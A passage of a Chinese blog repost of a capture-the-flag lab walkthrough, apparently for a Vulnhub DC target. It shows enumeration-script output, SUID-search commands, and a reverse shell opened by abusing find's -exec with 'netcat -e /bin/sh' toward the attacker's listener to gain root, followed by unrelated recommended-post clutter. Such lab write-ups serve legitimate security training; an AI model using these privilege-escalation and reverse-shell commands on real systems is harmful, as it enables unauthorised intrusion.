1319 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
1320 -rw-r--r-- 1 root root 3173 Dec 16  2017 /etc/reportbug.conf
1321 -rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
1322 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
1323 -rw-r--r-- 1 root root 284 Sep 25  2010 /etc/updatedb.conf
1324 -rw-r--r-- 1 root root 191 Feb  1  2012 /etc/libaudit.conf
1325 -rw-r--r-- 1 root root 604 May 16  2012 /etc/deluser.conf
1326 -rw-r--r-- 1 root root 2940 Feb 12  2016 /etc/gai.conf
1327 -rw-r--r-- 1 root root 2632 Oct  8  2014 /etc/rsyslog.conf
1328 -rw-r--r-- 1 root root 2082 May 20  2012 /etc/sysctl.conf
1329 -rw-r--r-- 1 root root 214 May 11  2013 /etc/idmapd.conf
1330 -rw-r--r-- 1 root root 956 Feb 22  2015 /etc/mke2fs.conf
1331 -rw-r--r-- 1 root root 552 Apr 30  2012 /etc/pam.conf
1332 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
1333 -rw-r--r-- 1 root root 2969 Dec 26  2012 /etc/debconf.conf
1334 -rw-r--r-- 1 root root 9 Aug  8  2006 /etc/host.conf
1335 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
1336 -rw-r--r-- 1 root root 475 Aug 29  2006 /etc/nsswitch.conf
1337 
1338 
1339 [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
1340 /home/flag4/.bash_history
1341 cd 
1342 ls
1343 vi flag4.txt
1344 ls
1345 exit
1346 
1347 
1348 [00;31m[-] Any interesting mail in /var/mail:[00m
1349 total 8
1350 drwxrwsr-x  2 root mail 4096 Feb 19 22:24 .
1351 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..
1352 
1353 
1354 [00;33m### SCAN COMPLETE ####################################[00m
View Code

发现了弱点尝试进行suid提权

参考文章https://pentestlab.blog/2017/09/25/suid-executables/

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

 

 

反弹shell 

攻击机

root@panli:~# nc -lvvp 8999
listening on [any] 8999 ...

在meterpreter的shell中执行find suidtest -exec netcat -e /bin/sh  192.168.0.117 8999 \;

成功提权

转载于:https://www.cnblogs.com/test404/p/10822810.html

weixin_30648963
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
m.555lu.co list.php,【龙腾原创】boost详解+mathcad计算+saber仿真(完成)
weixin_35090568的博客
03-13 777
你的这几个,Gvg,Gvd,Gig,Gid都没有问题。很可能计算也是正确的。但证明不了这是,电压外环和电流内环的串级控制。仅仅是在D和Vg作用下的2个不同的输出变量而已。Vo和Ig用风马牛不相及来形容是确切的。对于任何一个实际的所谓“电流型”IC,例如3842之类的。其实就是个单独电压环路的控制。充其量是电流保护“逐波限流”而已。3842的工作原理,以无可争辩的方式证明了。其就是个电压型的单环路控...
20130828可注册域名列表
热门推荐
落寞红尘
08-28 23万+
aabkx.com aapun.com abmrw.com abnks.com acphq.com acsgq.com actcL.com aderz.com adjni.com adojj.com adyjy.com afabd.com afcfx.com afrhi.com afubd.com ahscp.com aihtt.com aimfp.com ai
CSDN博客专家证书发放名单(已暂停)
CSDN 官方博客
07-12 5万+
博客专家专属奖励。
Mysql 省市区字典(带层级,带经纬度,带拼音)
༺墨༒眉༻
05-30 8207
效果展示: 资源下载:https://download.csdn.net/download/qq_24909089/10725978 因为编辑器加载的样式较多,难以复制,所以使用无样式文本,如想看可看标准字典:点击打开链接 字典:   文本字典 # ************************************************************ # S...
Co-Channel Interference.zip_1188.co?m_Cellular network_co-channe
07-15
cochannel interference reduction
DC-DC PCB layout 指导.docx
06-18
1. Bad layout 会导致 EMI 干扰,降低 DC-DC 的性能。因此,需要尽量减少 layout 的噪声和干扰。 2. 开关大电流回路尽量短信号地和大电流(功率地)单独走线,并在芯片 GND 处单点连接。这样可以减少噪声和干扰,...
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
基于单片机控制的DC-DC变换电路
01-12
通过对DC-DC直流转换器输出电流进行监测,通过键盘输入输出电流设定信号,通过单片机输出PWM信号与LM358比较器形成比较电压,电流反馈闭环电路,从而对LM2596芯片进行控制,控制buck电路的接通关断,以保证DC-DC的...
AC-DC变换器_multisim_AC-DC_
09-29
Multisim9文件\模电实验图----AC-DC变换器
DC-DC变换器Simulink仿真模型
08-07
本人在Simulink平台搭建的DC-DC变换器仿真模型,可以使用构成你自己模型的一部分。
VC目录树的文件搜索器
12-17
用VC实现的一个文件搜索程序。用到了目录树,搜索指定后缀名的文件
用vc写的全屏数字时钟程序源代码
01-08
用vc写的全屏数字时钟程序源代码,可以作为屏幕保护.
pycparser-2.18.tar.gz_cekc 18_cekc pyckn_cekc18_chargeo8a_python
09-20
python C parser library which used for python version above 3.6
最全软件资源清单
MarcoWong1985的博客
03-11 4万+
最全软件资源清单
HTTP协议
余音的博客
06-02 9921
HTTP协议(全称叫做"超文本传输协议") 是一种应用非常广泛的应用层协议HTTP协议处于TCP/IP协议栈的应用层 HTTP协议在传输层是基于TCP的(HTTP/1 ,HTTP/2是基于TCP,最新版本HTTP/3是基于UDP的,当今互联网使用最多的是HTTP/1.1)HTTP 是一个文本格式的协议. 可以通过 Chrome 开发者工具或者 Fiddler 抓包, 分析 HTTP 请求/响应的细节.以 Fiddler 为例. (下载地址: https://www.telerik.com/fiddler/)
IE主页被改为http://www.9348.cn?原来是QQ2009.exe,TXP1atform.exe,svchoct.exe,klan.sys等作怪2
Purpleendurer@CSDN
06-18 1万+
(续:IE主页被改为hxxp://www.9348.cn?原来是QQ2009.exe,TXP1atform.exe,svchoct.exe,klan.sys等作怪1http://blog.csdn.net/Purpleendurer/archive/2009/06/13/4267188.aspx) endurer 原创2009-06-18 第1版 从pe_xscan的log
live555转发ps流的时间戳及分帧问题
uwonderslzk315的专栏
06-13 3717
现在基本实现live555转发ps流,但是由于没有正确处理时间戳及分帧问题,d
jquery--选择器sizzle源码分析
weixin_34245169的博客
04-15 278
1 (function( window, undefined ) { 2 3 var i, 4 cachedruns,//正在匹配第几个元素 5 Expr, //Sizzle.selectors的快捷方式 6 getText,//获取文本函数 7 isXML, //是否为xml ...
dc-dc仿真电路 multisim
10-31
DC-DC仿真电路在Multisim软件中是一种用于模拟和调试DC-DC转换器的工具。它可以帮助工程师在设计和优化DC-DC转换器时进行电路仿真和性能分析。 首先,我们可以在Multisim中选择合适的电路元件来构建DC-DC转换器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值